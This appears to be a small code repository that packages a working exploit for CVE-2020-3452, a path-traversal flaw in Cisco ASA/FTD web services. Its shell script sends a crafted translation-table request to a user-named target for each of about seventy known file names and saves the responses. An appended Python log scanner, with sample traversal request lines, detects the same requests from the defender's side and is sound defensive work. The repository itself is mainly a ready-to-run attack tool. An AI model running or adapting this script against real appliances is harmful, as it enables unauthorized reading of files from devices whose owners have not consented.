├── README.md
├── cisco_asa_file_list.txt
└── cve-2020-3452.sh


/README.md:
--------------------------------------------------------------------------------
# CVE-2020-3452-Exploit
Just a basic exploit abusing CVE-2020-3452 to enumerate the standard files accessible in the web directory of Cisco ASA/FTD appliances.

## Usage:
By default this uses a file list constructed from sample output from `CVE-2018-0296` in the Metasploit Framework (https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md).
```
Usage: cve-2020-3452.sh
Example: cve-2020-3452.sh mytarget.com
Files that are downloaded will be in the newly created 'cisco_asa_files' directory
```

--------------------------------------------------------------------------------
/cisco_asa_file_list.txt:
--------------------------------------------------------------------------------
logo.gif
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
041235123432C2
041235123432U2
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen

--------------------------------------------------------------------------------
/cve-2020-3452.sh:
--------------------------------------------------------------------------------
# Target host name is the first argument.
TARGET=$1
# Same names as cisco_asa_file_list.txt, space separated.
CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen"
# Output directory for the responses.
mkdir cisco_asa_files

if [ -z "$1" ];
then
    echo "Usage: cve-2020-3452.sh "
    echo "Example: cve-2020-3452.sh mytarget.com"
    echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
    echo "Target not specified...exiting..."
else
    # Request each known file through the translation-table endpoint and keep a copy of the response.
    for FILE in $CISCO_KNOWN_FILES;
    do
        curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
    done
fi

--------------------------------------------------------------------------------
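A defender-side check for the request shape that cve-2020-3452.sh sends, as an added example that is not part of this repository: it scans web access logs for requests to `/+CSCOT+/translation-table` whose `lang` parameter contains a `..` segment or whose `textdomain` names a path under `+CSCOE+`. It assumes request URIs are logged in combined log format by a reverse proxy or similar device in front of the appliance; the function names, log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

ENDPOINT = "/+CSCOT+/translation-table"  # path requested by the script above
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DOTDOT_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so the match does not depend on client encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_probe(uri):
    """True when the URI has the shape of the request issued by the script above."""
    parts = urlsplit(uri)
    if fully_decode(parts.path).rstrip("/") != ENDPOINT:
        return False
    params = {}
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        params[fully_decode(name).lower()] = fully_decode(value)
    # Assumption: a dot-dot segment in lang, or a textdomain naming a path under
    # +CSCOE+, is never part of a normal translation-table lookup.
    lang_escapes = bool(DOTDOT_RE.search(params.get("lang", "")))
    domain_is_path = "+cscoe+/" in params.get("textdomain", "").lower()
    return lang_escapes or domain_is_path

def scan(log_lines):
    """Return (client, uri) for every access-log line that matches."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if m and is_traversal_probe(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed sample lines in combined log format (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2020:10:00:01 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Aug/2020:10:00:02 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/logon.html&default-language&lang=../ HTTP/1.1" 200 2048',
    '203.0.113.20 - - [01/Aug/2020:10:00:03 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 5120',
    '203.0.113.20 - - [01/Aug/2020:10:00:04 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&lang=en HTTP/1.1" 200 1024',
]
if __name__ == "__main__":
    print("\n".join(f"{client} {uri}" for client, uri in scan(SAMPLE_LOG)))
```

A burst of matches from one client across many of the file names in cisco_asa_file_list.txt is the pattern this script produces, since it requests every name in sequence.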